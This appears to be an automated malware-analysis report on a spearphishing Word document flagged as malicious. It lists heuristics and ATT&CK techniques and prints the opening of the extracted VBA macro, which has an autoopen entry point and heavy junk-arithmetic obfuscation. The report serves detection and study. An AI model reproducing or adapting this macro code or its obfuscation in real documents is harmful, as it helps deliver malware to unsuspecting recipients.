Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains critical heuristics indicating the presence of an auto-executing VBA macro (autoopen) that uses GetObject for execution. The VBA script itself is heavily obfuscated, but the presence of auto-execution and the GetObject call strongly suggest it's designed to download and run a secondary payload. The file type and macro presence point to a spearphishing attachment delivery method.
Heuristics (7)

- ClamAV: Doc.Malware.Obfuse-6895490-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Obfuse-6895490-0
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- AutoOpen macro (high) [OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: bd8e97c4db1a606ea9ad55bdd8cce74abe02342c1ba5d6425dc72b9db3dbbe6e) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 61070 bytes |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "wACAZQA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function AUwABDAB()
If sAAAAZ = EAUAAAAA Then
Y_4AQZ = 147585807 * V__AAA
fBwADcU = OUwABw - 191099252 + 720052062 + iAAQZUAA * 224499640 / 634110451 + 599572848 / Chr(373981189 / CSng(699200989 + Round(bAA_UZo))) + 317857447 * Log(WDABwA) - 324874379 - 288055138 + jQDUUAU_ * CLng(uxoo1AAA - Atn(kZBBDA / 344702189 / 674772443 + ODAQAAD))
dQUwQA = 404253969 * OABAAc
End If
If nAAZDX = cZAwDA Then
ooAAZA = 516118619 * AAAo_BDA
GwABADoQ = PDU44AG_ - 555871491 + 615251656 + C4D1DA * 70916384 / 912503681 + 362294089 / Chr(762957610 / CSng(706948175 + Round(sC1AB41))) + 591935835 * Log(wXQ1AAA) - 888979072 - 48021418 + JXXocAGx * CLng(TBXADDB - Atn(WAAAAD / 537719910 / 165014765 + XoGoQG))
nBA4BU = 50272901 * SQAQAAx
End If
If nAoA4w = tADABAG Then
oQAoAQw4 = 556823467 * MQZAAAA
NAoDwB = W_ZUCAA - 679625556 + 70816905 + wGGxwA * 351866244 / 73364913 + 263659933 / Chr(720751293 / CSng(391946416 + Round(mw_kAA))) + 657384064 * Log(qXDZx1) - 536852450 - 441663984 + wACA44 * CLng(tZDGAD_ - Atn(oAQ1BZQB / 485352911 / 944848086 + CQAQX_DA))
b1XQABkk = 17096040 * iQQXADA
End If
If LAUAQAA = sABAQZ Then
NUAAAU = 997873575 * QBZQAAA
OAx41_4 = dUc_BZAA - 953199858 + 141405588 + vUcACo * 471053551 / 648328735 + 133422300 / Chr(409706559 / CSng(781855739 + Round(KAxGUc))) + 736006275 * Log(WAUBcc4U) - 954979538 - 919207275 + SBAAD4k * CLng(HAXADBAG - Atn(aQAAAQ / 83593748 / 884021611 + m_oAGB))
LAU4DA1A = 195819998 * VGUUAwQ
End If
If NCCAAA = iACBAA Then
jQDAAA = 865032894 * k4kDxcB
dAxCDcA = ioAGAA4_ - 670020160 + 476173468 + aDGACA * 83734863 / 835388103 + 633579503 / Chr(159824820 / CSng(393708227 + Round(DBAAUDQ))) + 1683046 * Log(UkxAUQ) - 574456162 - 316210274 + GAAAXkG * CLng(KZZDxA - Atn(kCD4w4 / 899100121 / 292967545 + DUAAB1_Q))
wQBUAA = 705066765 * nxcB_oDc
End If
If FUBBx1 = XBxAAZUD Then
cAAAAwwD = 932187187 * K4ADAZ
MZXAAU = w1_CBACA - 161652241 + 618272627 + jAADD_ * 243289908 / 958388756 + 676852848 / Chr(52941582 / CSng(179090625 + Round(PXwDcZk))) + 525389329 * Log(p_xUDG) - 164536416 - 936656633 + B_A4BA * CLng(dDAD_4B - Atn(qAkXAXDk / 883649650 / 86772452 + PZkDAA))
jZGAGCD = 346107645 * VBkADQ
End If
If XBACAC1A = loAkAA Then
vQAkoAA = 159908783 * qkUDZCw
MCAAUk = UABUDU - 961575291 + 216251274 + QUXXZQA * 830996051 / 863944843 + 452465835 / Chr(618750096 / CSng(387760673 + Round(bA_AXQAx))) + 840377929 * Log(AAD_UAo) - 930324173 - 597946304 + zA_CCBAB * CLng(SCoUAQ - Atn(QABBo__U / 354552377 / 461194431 + XXcAGUCA))
lAXAGDw = 759059934 * sk14BD
End If
If SU4ZUQ = dkAA4x Then
iwAQAAD = 871690813 * qAAUG14Q
jAcQQwAx = AAQCAAX - 875136749 + 882277440 + mAQcDAX * 424339926 / 438391795 + 44480239 / Chr(856342606 / CSng(574474964 + Round(MwAwDAAo))) + 394970138 * Log(UZAADUoA) - 518812154 - 955537957 + p_UA4B4 * CLng(MkDAkAA - Atn(sAUwGA / 111541506 / 789912481 + wQxowQA))
NAAQGAAU = 959133475 * DDkZDCAB
End If
End Function
Sub autoopen()
On Error Resume Next
If RCCAQC1 = iAACCA Then
hk_UQU = 431779963 * jBA_AAAX
OAUQAU = aA1AAAx - 494703943 + 674859779 + oQQAoAAD * 615253415 / 540753567 + 708066368 / Chr(990190702 / CSng(741551101 + Round(qAAAAxD))) + 949644567 * Log(jCU1_QA) - 96326171 - 532684623 + m1QQ4AB * CLng(NQAoAXAA - Atn(kB4_A1x / 76568313 / 163906112 + uwGADQA))
iwAkUDAQ = 958926856 * lcoQDk
End If
If NAAAUZ = BAAA1Ax Then
Tco4AUUQ = 917030532 * bAAUBA
WAUAXQ = wDoAABA - 400846237 + 359002928 + GXAB_A1 * 919054904 / 296367878 + 792332386 / Chr(200877891 / CSng(418426193 + Round(nCAGAGDw))) + 124232417
... (truncated)